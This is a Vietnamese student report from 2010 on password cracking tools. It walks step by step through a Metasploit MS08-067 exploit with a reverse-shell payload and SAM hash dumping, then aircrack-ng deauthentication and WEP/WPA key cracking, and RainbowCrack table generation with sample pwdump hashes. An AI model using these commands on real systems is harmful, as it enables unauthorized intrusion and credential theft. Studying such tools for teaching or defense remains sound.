1. Trang chủ
  2. » Luận Văn - Báo Cáo

Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất pdf

77 714 2
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất
Tác giả Phan Công Lâm, Nguyễn Thúc Toàn, Nguyễn Huy Tưởng
Người hướng dẫn T.S Đào Thế Long
Trường học Trường đại học mở thành phố Hồ Chí Minh
Chuyên ngành Công Nghệ Thông Tin
Thể loại Báo cáo
Năm xuất bản 2010
Thành phố Thành phố Hồ Chí Minh
Định dạng
Số trang 77
Dung lượng 2,95 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Hình3 :Khi chạy xong chúng ta sẽ thấy password đã được crack hiển thị ở cột NT Pwd.I.Giới Thiệu Về Wireless Lanwlan,WEP,WPA • WLAN là một loại mạng máy tính nhưng việc kết nối giữa các t

Trang 1

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC MỞ TPHCM KHOA CÔNG NGHỆ THÔNG TIN



Sinh viên: 1 Phan Công Lâm, Mssv:09H1012053

2.Nguyễn Thúc Toàn,Mssv:09H1012110 3.Nguyễn Huy Tưởng,Mssv:09H1012125

10, tháng 11, năm 2010

Trang 2

Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện nay.Đối với người được trang bị những hiểu biết cơ bản về hệ điều hành mà lần đầu tiên muốn khôi phục mật khẩu thì Ophcrack quả là một công cụ rất nhanh và dễ dàng sử dụng.

Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật khẩu đã mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có thể ghi ra đĩa CD rồi khởi chạy đĩa

CD đó Khi chương trình Ophcrack đã chạy, bạn xác định vị trí tài khoản người dùng Windows

và thực hiện quá trình khôi phục mật khẩu Tất cả các bước thực hiện hoàn toàn là tự động.

1 Cài đặt OPHCRACK

Việc cài đặt Ophcrack tương đối dễ, tuy nhiên có phần lựa chọn các thành phần cài đặt cần lưu

ý –Hình 1.

Hình 1: Chọn các compornents để cài đặt vào mục tables cho ophcrack

Trên Hình 1, nếu đã download, có thể lựa chọn một số lựa chọn sau:

- Continue without install the table: Cài đặt chỉ có chương trình Ophcrack, khôngcó

Rainbow Table.

Trang 3

- Download alphanumenic table from Internet (388MB-SSTI04-10K): cài đặt và download Rainbow Table loại SSTI04-10K.

- Download alphanumenic table from Internet (733MB-SSTI04-5K): cài đặt và download

Rainbow Table loại SSTI04-5K.

- Install alphanumenic table from CD or DVD (388MB-SSTI04-10K): cài đặt Ophcrack và sử dụng Rainbow Table loại SSTI04-10K từ CD hoặc DVD.

- Install alphanumenic table from CD or DVD (733MB-SSTI04-5K): cài đặt Ophcrack và sử dụng Rainbow Table loại SSTI04-5K từ CD hoặc DVD.

Rainbow Table loại SSTI04-5K có kích thước 733MB được dùng cho các máy tính có RAM từ 512MB trở lên Rainbow Table loại SSTI04-10K có kích thước 388MB được dùng cho các máy tính ít RAM hơn.

Nếu trong trường hợp bạn download riêng đĩa LiveCD, hoặc download các Rainbow Table theo

link dưới đây, thì lựa chọn Continue without install the table.

Code:

Rainbow Table loại SSTI04-10K (388MB) http://lasecwww.epfl.ch/SSTIC04-10k.zip Rainbow Table loại SSTI04-5K (733MB) http://lasecwww.epfl.ch/SSTIC04-5k.zip

Sau khi cài đặt, chạy chương trình, giao diện của Ophcrack như Hình 2.

Hình 2: Giao diện Ophcrack trên Windows

Trên hình 2, trước khi sử dụng, click vào nút Tables để chọn đường dẫn đến bảng Rainbow

Table – hình 3.

Trang 4

Hình 3: Select ophcrack table.

Trên Hình 3, mở đến đĩa LiveCD, mục slax\ophcrack\tables, sau đó nhắp OK.

2 Kết hợp metasploit với ophcrack crack password window winxp sp2.Trong ví dụ này chúng ta sẽ dùng backtrack 4, trong đĩa backtrack này có tích hợp sẵn

metasploit và ophcrack Sau đây là các bước để thực hiện các bước crack một password của window xp sp2.

ở đây ta sẽ lợi dụng lỗi bảo mật “ Microsoft Security Bulletin MS08-067 của Microsoft cho Windows Server Service” để khai thác thông tin Đây là lỗ hổng nghiêm trọng nằm trong dịch

vụ Server Service RPC của hệ điều hành Windows.Với lỗi này, Hacker hoàn toàn có thể điều khiển máy tính từ xa với quyền cao nhất của hệ thống.

Mức độ nguy hiểm: Rất cao.

Mô tả kỹ thuật

Server Service là dịch vụ cho phép máy tính cài đặt hệ điều hành Windows có thể chia sẻ file, máy in,… qua mạng và là dịch vụ không thể thiếu của hệ điều hành Dịch vụ này hỗ trợ giao thức RPC, trong đó có một chức năng tiếp nhận và xử lý một yêu cầu muốn chuyển đổi đường dẫn (vídụ \\C\Program Files\ \Windows) về định dạng đường dẫn Canonicalization

( \\C\Windows) Tuy nhiên, quá trình xử lý này đã không kiểm soát độ dài của đường dẫn trong yêu cầu và xảy ra lỗi tràn bộ đệm.

Như vậy, với việc thực hiện một yêu cầu RPC với đường dẫn có độ dài “quá khổ”, Hacker dễ

Trang 5

dàng thực thi mã độc trên các máy tính từ xa nhằm chiếm quyền điều khiển, cài đặt virus, ăn cắp thông tin…

Các bước thực hiện

Bước 1: Khi chúng ta khởi động backtrack Chúng ta mở một console và gõ lệnh theo cú pháp

sau để chạy metasploit.

Theo như tấm hình này ta sẽ sử dụng metasploit phiên bản 3.

Bước2: ta gõ cú pháp : “use exploit/windows/smb/ms08_067_netapi” để sử dụng lỗi bảo mật

này.

Bước3 : ở bước này ta sẽ thực hiện các lệnh để cấu hình các thuộc tính để chuẩn bị cho cuộc

tấn công chiếm quyền điều khiển.

Cú pháp :

set payload windows/meterpreter/reverse_tcp //Meta-Interpreter là một advanced payload Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn công các máy

remote computers.Nó được viết từ các developers dưới dạng shared object( DLL) files

Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi

Trang 6

lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus

Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers.

set RHOST 192.168.1.1 // đây là địa chỉ ip của máy victim.

set LHOST 192.168.1.2 // đây là địa chỉ ip của máy tấn công.

Khi đã chuẩn bị xong các cấu hình ta sẽ có một bảng với các thong số như hình trên.

Bước4: ở bước này ta sẽ tiến hành khai thác lỗi.

Trang 7

Bước5 : Khi đã vào được máy victim Ta dung lệnhh ashdump để hash files an trong window

xp.

Bước6 :Ở bước thứ 5 ta đã hash dump được file sam trong win Ta sẽ copy đoạn hash dump

đó vào trong file text Và lưu lại.

Bước7 :ta khởi động chương trình ophcrack GUI và tiến hành crack mật khẩu Ta sẽ load file

hash đã được tạo từ bước 6 vàovà nhấn nút crack Và đợi chờ kết quả của chương trình trả về Lưu ý :Khi sử dụng ophcrack chúng ta phải có bộ directories của rainbow table Chúng ta có thể download các tables đó ở đây.

Link download : http://sourceforge.net/projects/ophcrack/files/tables/

Trang 8

Dưới đây là các hình ảnh dung phần mềm ophcrack để crack file hash.

Hình1 : load file hash đã copy được

Hình2 :Nhấn nút crack để bắt đầu crack mật khẩu file hash

Trang 9

Hình3 :Khi chạy xong chúng ta sẽ thấy password đã được crack hiển thị ở cột NT Pwd.

I.Giới Thiệu Về Wireless Lan(wlan),WEP,WPA

WLAN là một loại mạng máy tính nhưng việc kết nối giữa các thành phần trong

mạng không sử dụng các loại cáp như một mạng thông thường, môi trường truyền thông của các thành phần trong mạng là không khí Các thành phần trong mạng sử dụng sóng điện từ để truyền thông với nhau.Institute of Electrical and Electronics Engineers(IEEE) đã phê chuẩn sự ra đời của chuẩn 802.11, với tên gọi WIFI (Wireless Fidelity) cho các mạng WLAN.Là một bộ giao thức cho thiết bị không dây dựa trên chuẩn 802.11a/b/g bao gồm các Access Point và các thiết bị đầu cuối không dây như pc card, usb card, wifi PDA… kết nối với nhau Wifi hiện nay có 3 kiểu mã hoá chính gồm: WEP-Wired Equivalent Privacy , WPA-Wireless Protected Access và WPA2

Trang 10

WEP (Wired Equivalent Privacy) là một hệ thống dùng để mã hóa, giải mã

dữ liệu và bảo mật dữ liệu cho mạng Wireless, WEP là một phần của chuẩn 802.11 gốc dựa trên thuật toán mã hóa RC4, mã hóa dữ liệu 40bit để ngăn chặn

sự truy cập trái phép từ bên ngoài

WPA (Wi-fi Protected Access) được thiết kế nhằm thay thế cho WEP vì có

tính bảo mật cao hơn Temporal Key Intergrity Protocol (**IP), còn được gọi là WPA key hashing là một sự cải tiến dựa trên WEP, là vì nó tự động thay đổi khóa, điều này gây khó khăn rất nhiều cho các Attacker dò thấy khóa của

mạng.Mặt khác WPA cũng cải tiến cả phương thức chứng thực và mã hóa WPA bảo mật mạnh hơn WEP rất nhiều

II.Aircrack-ng:

II.1-Giới thiệu Aircrack-ng:

Hầu như hiện nay khi nhắc tới Crack password Wireless thì chúng ta nghĩ ngay đến chương trình Aircrack Aircrack là chương trình crack password wireless rất mạnh, một công cụ bẻ khóa WEP/WPA nhanh nhất,chạy được trên Windows và Linux.

Aircrack hỗ trợ các chuẩn không giây 802.11a/b/g dùng để Crack WEP và WPA-PSK Nó

có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ 40 tới 512-bits và đủ cho giải mã hầu hết các gói tin trên mạng Wireless Công cụ này còn hỗ trợ để bẻ khóa WPA1 và WPA2 bằng phương thức Brute Force Attack Ngoài ra với airdecap chúng có khả năng giải mã các file được mã hóa bởi WEP và WPA.

Trang 11

II.2 Aircrack-ng hỗ trợ việc lựa chọn card wireless thích hợp:

Chưa xác

D-Link DWL-650 PCMCIA Prism

2,5 Nội bộ airodump-ng CóD-Link DWL-G630 C2 v3.01 CardBus Atheros Nội bộ airodump-ng Có D-Link DWL-G630 E1 Ralink Atheros Nội bộ Airodump-ng Có D-Link DWL-G650 CardBus Atheros Nội bộ Airodump-ng Có

Trang 12

C3 , C4 , B5 C3, C4, B5

Linksys WPC55AG

MSI CB54G2 CardBus Ralink Nội bộ Không Có Netgear WAG511 CardBus Atheros Nội bộ Airodump-ng có Netgear WG511T CardBus Atheros Nội bộ Airodump-ng có Netgear WG511U CardBus Atheros Nội bộ Airodump-ng có Proxim 8470-WD CardBus Atheros MMCX không có Senao NL-2511

CD PLUS EXT CD PLUS

Khuyến cáo ta nên dùng card Atheros chipset.

II.2-Một số điều cần biết khi Crack Password:

1 Card mạng của bạn không chuyển về chế độ monitor được – hãy xem danh sách card được

hỗ trợ trên trang trên.

2 Chỉ có thể dò được khóa WPA/WPA2-PSK3 Change mac address có thể sẽ gặp lỗi không authentication được.

4 Sự im lặng của router: nếu trong mạng của AP không có máy con kết nối thì ta sẽ nhanh chóng nhận ra là mình không hề bắt được một gói tin ARP nào hết Lý do là các AP đời sau này

đã được harderning, chúng rất yên lặng, khó mà cạy ra được một gói tin ARP nào Giải pháp:là hãy thử crack nó vào một thời gian khác hoặc dùng mdk3 để cố gắng reset AP, khi AP khởi động lại, nó sẽ quăng ra một ít gói tin ARP, dùng koreK hoặc fragment để crack chúng thôi

Trang 13

5.Khi bạn dùng Aireplay mà thấy gói tin gởi đi nhưng không có trả lời (ACK) thì mình phải chuyển sang STATION khác và áp dụng tương tự.

6.Dùng lệnh aireplay-ng mà thấy data tăng lên thì mới được chứ data mà đứng yên thì thua rồi.

7 Khi không thể chứng thực với AP thì có nhiều nguyên nhân, sai kênh, sai MAC AP(BSSID), quá xa, không có Client nào đang kết nối với AP.

II.3- Tiến Trình Chi Tiết Để Crack Password.

1 Xem interface của card mạng

_iwcofig hoặc _ _ifcofig để xem có những card mạng nào trong máy, thường là eth0 và

wlan0(chúng ta sẽ dùng wlan0)

2 Chuyển wlan0 về chế độ nghe ngóng

_airmon-ng wlan0 start Lệnh này sẽ tạo ra một card wireless ảo là mon0

3 Scan mạng wireless trong vùng bắt sóng

_ airodump-ng wlan0(mon0) để bắt sóng wifi

4 Tiến hành bắt gói tin

_airodump-ng channel [AP channel] bssid [MAC AP ] write capturefile wlan0

bắt gói tin của AP trên kênh nào đó với cái BSSID là MAC của AP và ghi ra một tên file

5 Tiến hành bắt tay với AP để tạo ra dòng tín hiệu.

_ aireplay-ng -1 0 -a <MAC AP> -c <MAC Client đang kết nối> wlan0

Trong cơ chế bảo mật WPA, khi muốn kết nối với AP thì Client cần phải gởi gói tin chứa 4-way handshake đến AP, trong gói tin đó chứa password(đã được hash) của mạng Để được

password ta phải có gói tin trên

Lưu ý: aireplay-ng -1 0: gởi tin tới AP tới bao giờ được chứng thực

Ý nghĩa của lệnh này là AP sẽ thông báo Client đã bị đá ra khỏi mạng và client sẽ phải gửi gói tin chứa 4-way handshake để yêu cầu kết nối lại Khi đó máy của hacker ta sẽ bắt được gói tin

6.Tạo cơ sở dữ liệu

Dùng lệnh theo thứ tự:

_airolib-ng crackwpa import essid essid.txt

để tạo CSDL tên là crackwpa và import cái tên AP vào trong cái file essid.txt mình đã tạo sẵn.

- airolib-ng crackwpa import passwd /đường dẫn tới file password.lst

- airolib-ng crackwpa batch : Kết hợp essid với password

- airolib-ng crackwpa stats : kiểm tra tính hợp lệ

Mục đích phần này là ta sẽ so sánh password với cái CSDL có trong Backtrack, vì thực chất việc dò

Trang 14

password là so sánh gói tin với list pass có sẵn trong máy

7.Crack capture file, tìm khoá password wep,wpa.

_aircrack-ng -b [AP BSSID] [capture file(s) name]

_aircrack-ng -r crackwpa wpa*.cap

Aircrack sẽ bắt đầu lục lọi trong số những gói dữ liệu đã bắt được để tìm ra khóa WEP.

III.Crack Password Wireless WEP Bằng Aircrac k

1.Chuẩn bị :

1.1.Phần cứng :

_ 1 AP có hỗ trợ bảo mật WEP

_ 1 PC có wireless card kết nối với AP-> Client

_ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ injection(chèn gói tin)->

Trang 15

2 Crack Password Wireless WEP Bằng Aircrack

2.1.Các bước cơ bản :

_ Bước 1 : chuyển wireless card về chế độ monitor

_ Bước 2 : scan mạng wireless và bắt dữ liệu từ AP target

_ Bước 3 : bơm gói ARP để tăng lưu lượng dữ liệu bắt được

_ Bước 4 : sau khi bắt đủ gói dữ liệu , dùng aircrack-ng dò password

2.2.Thực hiện crack WEP:

Bước 1 :

Xem các interface của card mạng :

Trường hợp này wireless card có interface là wlan0

Chuyển wlan0 về chế độ Monitor

airmon-ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0

Bước 2 :

Scan mạng wireless trong “vùng bắt sóng” của wireless card

Trang 16

Trong “vùng bắt sóng” của wireless card có 2 AP có WEP , 1 AP là SSID là Diep , 1 AP là quang1 (AP này có Power là -1 tức là mạng ad-hoc)

(ngoài ra còn có 1 AP mà cột ESSID ghi là <length: 7> tức là AP ẩn , Hidden SSID)

AP mà ta quan tâm là Diep có BSSID (MAC Address) 00:14:6C:06:D7:96 , ESSID (tên định danh của mạng) Diep , Channel là 11, và đang có 2 client kết nối

(tắt process airodump-ng mon0 đi)

Em xin giải thích một số thông số chính:

• BSSID : địa chỉ Mac của AP cần hack, có bao nhiêu AP sẽ được liệt kê hết ở đây

• PWR : là power ,chỉ độ mạnh yếu của mạng, power = -1 đó là mạng adhoc.

• Beacons : là các mốc kết nối

• #Data : số data luân chuyển trong mạng Dữ liệu càng cao càng tốt.

• #/s : là số lượng packet chuyển trong mạng trong 1 s.Tốc độ kết nối càng cao càng tốt.

• CH là channel (Kênh kết nối), một thông số quan trọng trong việc crack khóa.

• Thông số MB là chuẩn của AP: 11 MB là chuẩn b, 54 MB là chuẩn g.

• ESSID là tên của mạng(AP), nếu AP đang ẩn tên thì nó sẽ có dạng <length:x>.

• ENC : Bảo mật theo giao thức nào đó WEP, WPA, WPA2,

• CIPHER : Mã hóa theo kiểu nào đó CCMP, WEP,

Trang 17

• AUTH : Chứng thực theo kiểu nào đó PSK, TKIP,

• STATION : MAC của Client đang kết nối tới AP.

mon0 : interface ảo của wireless card dùng cho việc monitor

=> lệnh này có nghĩa là : mon0 sẽ bắt các gói dữ liệu đi qua AP có MAC là 00:14:6C:06:D7:96 trên kênh 11 và ghi vào file wep.cap

Những Client có PoWeR -1 là những client “bất hoạt” hoặc “ngoài vùng bắt sóng” của wireless card , ta chỉ cần quan tâm đến client có BSSID là 00:13:E8:BE:E9:C5.

Bước 3 :

Theo lý thuyết , muốn dò ra password của AP thì phải cần ít nhất khoảng 200.000 gói dữ liệu (tức là cột #data phải đạt đến con số 200.000) , nhưng trên thực tế thì khi data đạt đến

20.000-50.000 là có thể dò ra password.

Trang 18

Nếu cứ để lệnh airodump-ng bắt dữ liệu không thôi thì có khi đợi cả ngày vẫn chưa có 20.000

gói dữ liệu , do đó ta phải bắt và “bơm” các gói ARP để tăng lưu lượng dữ liệu qua lại

aireplay-ng -3 : standard ARP-request replay

-x 1000 : “bơm” 1000 gói mỗi giây (max là 1024 gói, mặc định là 500)

-b 00:14:6C:06:D7:96 : MAC address, Access Point

-h 00:13:E8:BE:E9:C5 : set Source MAC address , tức là MAC của client

mon0 : interface ảo của wireless card dùng cho việc monitor

=> lệnh này có nghĩa là : mon0 sẽ giả client 00:13:E8:BE:E9:C5 để “bơm” ARP vào AP

00:14:6C:06:D7:96, mỗi giây 1000 gói.

Các gói ARP được tạo ra khi client có yêu cầu kết nối với AP , vì vậy ta phải “đá” client ra :

aireplay-ng -0 1 : deauthenticate 1 lần

-a 00:14:6C:06:D7:96 : set Access Point MAC address

-c 00:13:E8:BE:E9:C5: set Destination MAC address

mon0 : interface ảo của wireless card dùng cho việc monitor

=> lệnh này có nghĩa là : mon0 sẽ giả danh AP 00:14:6C:06:D7:96 và gởi đến client

00:13:E8:BE:E9:C5 thông tin rằng “anh đã bị đá ra khỏi mạng” , client sẽ phải gởi gói ARP

yêu cầu kết nối lại với AP Lúc này lệnh aireplay-ng -3 ở trên sẽ bắt được gói ARP và “bơm” nó vào AP

Quay lại cửa sổ của lệnh airodump-ng và aireplay-ng ta sẽ thấy cột #Data tăng lên rất nhanh

Trang 19

Bước 4 :

Đến khi cột #Data được trên 20.000 gói thì ta bắt đầu dò password từ file cap (được tạo ra ở

bước 2) bằng lệnh aircrack-ng

Trang 20

Password dò được là 0987177185 (sau khi đã lọc ra các dấu “ : “ )

IV.Crack Password Wireless WPA Bằng Aircrack

Trang 21

IV.1-Chuẩn bị :

a).Phần cứng :

_ 1 AP có hỗ trợ bảo mật WPA

_ 1 PC có wireless card kết nối với AP-> Client

_ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ injection(chèn gói tin)->

IV.2 Crack Password Wireless WPA Bằng Aircrack

IV.2.1.Các bước cơ bản :

_ Bước 1 : chuyển wireless card về chế độ monitor

_ Bước 2 : scan mạng wireless và bắt dữ liệu từ AP target

_ Bước 3 : bắt 4-way handshake

_ Bước 4 : dùng aircrack-ng + file từ điển (hoặc pre-computed database) để dò password

IV.2.2.Thực hiện Crack Password Wireless WPA:

Bước 1 :

Xem các interface của card mạng :

Trường hợp này wireless card có interface là wlan0

Chuyển wlan0 về chế độ Monitor

Trang 22

airmon-ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0

Bước 2:

Scan mạng wireless trong “vùng bắt sóng” của wireless card

Ở đây ta có 1 AP có BSSID là 00:13:D4:68:D2:08 , channel 7 , bảo mật WPA2 , mã hóa

kiểu CCMP , chứng thực PSK , cột ESSID ghi là <length: 7> tức là AP ẩn ,

và có 1 client 00:13:E8:BE:E9:C5 đang connect

Ta sẽ bắt dữ liệu từ AP ẩn có BSSID 00:13:D4: 68: D2:08 trên channel 7 và ghi vào file

wpa2.cap

Trang 23

Bước 3 :

Trong cơ chế bảo mật WPA, khi muốn kết nối với AP, client sẽ gởi gói tin có chứa 4-way

handshake đến đến AP, trong gói tin đó có chứa thông tin về password (đã được hash) của

mạng WPA Ta phải được gói tin có chứa 4-way handshake thì mới có thể tìm ra được

password

Để làm được điều này , ta phải “đá” client ra :

Trang 24

aireplay-ng -0 1 : deauthenticate 1 lần

-a 00:13:D4:68:D2:08 : set Access Point MAC address

-c 00:16:44:7B:F9:BC : set Destination MAC address

mon0 : interface ảo của wireless card dùng cho việc monitor

=> lệnh này có nghĩa là : mon0 sẽ giả danh AP 00:13:D4:68:D2:08 và gởi đến client

00:16:44 :7B:F9:BC thông tin rằng “anh đã bị đá ra khỏi mạng” , client sẽ phải gởi gói tin

chứa 4-way handshake yêu cầu kết nối lại với AP Lúc này lệnh airodump-ng ở trên sẽ bắt được gói tin chứa 4-way handshake , và cũng sẽ dò ra được SSID của AP

(quay lại cửa sổ airodump-ng)

Bước 4 :

Công việc cần làm bây giờ là phải dò ra password từ gói dữ liệu chứa 4-way handshake mà ta bắt được (đã lưu vào file cap)

Trang 25

Ta chỉ quan tâm đến 3 file :

_ database : file pre-computed database , chứa các từ khóa đã được hash (ở dạng binary) cho phù hợp với các SSID cụ thể

_ dic : file từ điển , chứa các từ khóa (ở dạng text) có thể là password của AP

_ wpa2-01.cap : file chứa 4-way handshake,được tạo ra bởi lệnh airodump-ng ở bước 2 + 3 Chúng tôi đã có :

+ file từ điển dung lượng ~ 40MB chưa ~ 3 triệu từ khóa

+ file database được tạo nên từ file từ điển trên , tương thích với SSID là default

Bắt đầu dùng aircrack-ng kết hợp với file từ điển đề dò password bắt được trong file cap :

Trang 26

Như ta thấy , nếu chỉ dùng file từ điển thô thì tốc độ dò chỉ khoảng 400 từ trên 1 giây -> muốn

dò được hết file từ điển 3 triệu từ thì mất khoảng 7500 giây ~ 2 giờ 5 phút

Để rút ngắn thời gian thì ta sẽ dùng aircrack-ng kết hợp với database :

Trang 27

Tốc độ đạt được gần 40.000 từ trên 1 giây -> 3 triệu từ mất hơn 1 phút

Sau 1 phút 19 giây thì đã dò ra được password

Trang 28

I.Giới thiệu về RainbowCrack :

RainbowCrack là chương trình tạo ra các bảng cầu vồng được dùng để crack password

đã được mã hóa Là công cụ bẻ khóa mật khẩu "mạnh mẽ" rất hiệu quả và giảm thiểu thời gian crack Password.

Rainbow Table là một bảng lookup đưa ra một Time-Memory Trade-Off được sử dụng

để khôi phục mật khẩu dạng text từ một password hash (băm) Các chương trình

thường sử dụng giải thuật băm (hash) để lưu trữ mật khẩu, Rainbow Table được sử dụng để làm ngược lại quá trình hash.

Thông thường các chương trình dò tìm mật khẩu thường dùng Brute Force Attach để thử với số lượng rất lớn các ký tự Với máy tính hiện nay, việc thử này chỉ có hiệu quả khi chiều dài của mật khẩu ít hơn 8 ký tự Với mật khẩu dài 7 ký tự và bao gồm tất cả các ký tự thì thời gian dò tìm theo kiểu Brute Force Attach mất khoảng 30 ngày Tất nhiên với một số tính năng gắn kèm như từ điển, thuật toán thử,… thì khoảng thời gian này sẽ được rút ngắn đi, nhưng không đáng kể Nếu sử dụng Rainbow Table, thời gian này khoảng 40 phút.

I.1-Các tính năng trong RainbowCrack:

 Tích hợp công cụ Full time-memory tradeoff, bao gồm các xử lý trên rainbow table , sắp xếp, chuyển đổi và tra cứu

 Hỗ trợ rainbow table của bất kỳ thuật toán băm

 Hỗ trợ rainbow table của bất kỳ ký tự

 Hỗ trợ rainbow table trong định dạng tập tin nguyên (rt.) Và định dạng file nén ( Rtc)

 Tính toán về hỗ trợ xử lý đa lõi

Trang 29

 Hỗ trợ tính toán trên GPU (thông qua công nghệ NVIDIA CUDA)

 Hỗ trợ tính toán trên đa GPU (thông qua công nghệ NVIDIA CUDA)

 Thống nhất định dạng tập tin rainbow table trên tất cả các hệ điều hành hỗ trợ

 Giao diện người dùng dòng lệnh

 Giao diện người dùng đồ họa (Windows) ,chạy trên Windows XP 32-bit, Windows Vista 32-bit và Windows 7 32-bit.

I.2-Các công cụ và mối quan hệ giữa chúng trong

RainbowCrack.

Phần mềm RainbowCrack bao gồm năm công cụ: rtgen, rtsort, rt2rtc, rtc2rt và rcrack Hình dưới đây giải thích mối quan hệ giữa các công cụ

II Xây dựng RainbowCrack:

RainbowCrack technique is the implementation of Philippe Oechslin's faster

time-memory trade-off technique.

Trang 30

The final reduced value is the password.

Hash and reduce till the provided hash value found.

Entry found, load starting value.

Hash and reduce till entry not found.

Compare with End Point in Rainbow table.

Reduce the Hash

RainbowCrack làm việc dựa trên việc tính trước tất cả password có thể có.

• Sau khi quá trình time-consuming này hoàn thành,password và thông tin khác được mã hóa của chúng được chứa trong một file gọi là rainbow table

• Một password được mã hóa có thể được so sánh nhanh với giá trị chứa trong table và bẻ khóa trong một vài giây

Rainbow tables nhỏ sẽ làm giảm nhu cầu lưu trữ và tăng hiệu suất của công

cụ rcrack

Ophcrack là công cụ bẻ khóa password áp dụng kỹ thuật rainbow table.

RainbowCrack bao gồm ba công cụ được sử dụng trình tự để thực hiện những

điều sau

Bước 1: Sử dụng chương trình rtgen để tạo ra các rainbow tables

Bước 2: chương trình rtsort sử dụng để sắp xếp bảng cầu vồng được tạo ra bởi rtgen

Bước 3: Sử dụng chương trình rcrack để tra cứu rainbow tables được sắp xếp theo rtsort

RainbowCrack Algorithm

Trang 31

Giao diện của Rainbow Crack

Bước 1: Sử dụng chương trình rtgen để tạo ra các bảng cầu vồng

Cú pháp của dòng lệnh là:

_rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index

chain_len chain_num part_index.

Giải thích các thông số :

hash_algorithm Các thuật toán băm (LM, NTLM, md5… ) được sử dụng trong

bảng cầu vồng.

Charset Các ký tự của tất cả các plaintexts trong bảng cầu vồng

Tất cả các ký tự có thể được định nghĩa trong file charset.txt plaintext_len_min

plaintext_len_max Hai tham số này xác định độ dài của tất cả các plaintexts trong bảng cầu vồng Nếu ký tự là số, plaintext_len_min là 1, và

plaintext_len_max là 5 Sau đó, plaintext là "12345" có thể bao gồm trong bảng, nhưng "123456" sẽ không được tính.

chain_num là số lượng các chuỗi cầu vồng trong rainbow table part_index xác định "điểm bắt đầu" trong mỗi chuỗi cầu vồng được tạo ra như thế nào Nó phải là một số (hoặc bắt đầu bằng

plaintext_len_min 1

plaintext_len_max 7

chain_len 3800

chain_num 33554432

Trang 32

Thuật toán The time-memory tradeoff là một thuật toán xác suất

Dù các tham số được lựa chọn, luôn luôn có xác suất mà các chữ thô trong bộ ký tự lựa chọn và phạm vi chiều dài plaintext là không được Tỷ lệ thành công là 99,9% với các tham số được sử dụng trong ví dụ này.

bảng hệ lệnh Các lệnh rtgen được sử dụng để tạo ra các bảng cầu vồng là:

rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0 rtgen md5 loweralpha-số

1 7 0 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 1 3800 33554432 0 rtgen md5 loweralpha-số

1 7 1 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 2 3800 33554432 0 rtgen md5 loweralpha-số

1 7 2 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 3 3800 33554432 0 rtgen md5 loweralpha-số

1 7 3 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 4 3800 33554432 0 rtgen md5 loweralpha-số

1 7 4 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 5 3800 33554432 0 rtgen md5 loweralpha-số

Trang 33

Để tạo ra bảng rainbow Vào thư mục RainbowCrack, và thực hiện lệnh sau:

rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0 rtgen md5 loweralpha-số 1 7 0

3800 33554432 0

Khi lệnh được hoàn tất, một file có tên "md5_loweralpha-số #

1-7_0_3800x33554432_0.rt" có kích thước 512 MB sẽ được đặt đúng chỗ Tên file là tất

cả các tham số dòng lệnh được kết nối, với phần mở rộng "rt" Chương trình rcrack cần mẩu thông tin này để biết các tham số của bảng cầu vồng.Vì vậy, đừng đổi tên file Các table còn lại có thể được tạo ra với các lệnh:

rtgen md5 loweralpha-numeric 1 7 1 3800 33554432 0 rtgen md5 loweralpha-số 1 7 1

Trang 34

1-7_5_3800x33554432_0.rt 512MB

Lúc này tiến trình tạo rainbow table hoàn thành

Bước 2: Chương trình rtsort sử dụng để sắp xếp rainbow tables

Những rainbow tables được tạo ra bởi rtgen cần một số xử lý cụ thể để làm cho bảng

tra cứu dễ dàng hơn Chương trình rtsort được sử dụng để sắp xếp các "điểm cuối" của tất cả rainbow chains trong một rainbow table

Bây giờ tiến trình sắp xếp rainbow table hoàn thành

Bước 3: Sử dụng chương trình rcrack để tra cứu rainbow tables

Chương trình rcrack được sử dụng để tra cứu các bảng cầu vồng Nó chỉ chấp nhận các

rainbow tables đã sắp xếp và đặt trong thư mục c: \ rt, để crack băm đơn dòng

lệnh sẽ là:

rcrack c:\rt\*.rt -h your_hash_comes_here rcrack c: \ rt \ * rt-h your_hash_comes_here

Để crack nhiều băm, đặt tất cả băm trong một file văn bản với mỗi băm là một dòng

Và sau đó chỉ định tên file trong dòng lệnh rcrack:

rcrack c:\rt\*.rt -l hash_list_file rcrack c: \ rt \ * rt-l hash_list_file

Nếu các bảng cầu vồng tạo ra dùng thuật toán LM , chương trình hỗ trợ đặc biệt rcrack

đã cho nó với "-f" chuyển lệnh Một bãi băm tập tin ở định dạng pwdump được yêu cầu làm đầu vào cho chương trình rcrack Tệp tin sẽ trông như thế này:

Administrator:500:1c3a2b6d939a1021aad3b435b51404ee:e24106942bf38bcf57a6a4b2 9016eff6:::

Trang 35

Guest:501:a296c9e4267e9ba9aad3b435b51404ee:9d978dda95e5185bbeda9b3ae00f84 b4:::

Các tập tin pwdump là đầu ra của pwdump2, pwdump3 hoặc các tiện ích khác Nó chứa

cả LM hash và NTLM hash

Để crack hashes LM trong file pwdump, sử dụng lệnh sau đây:

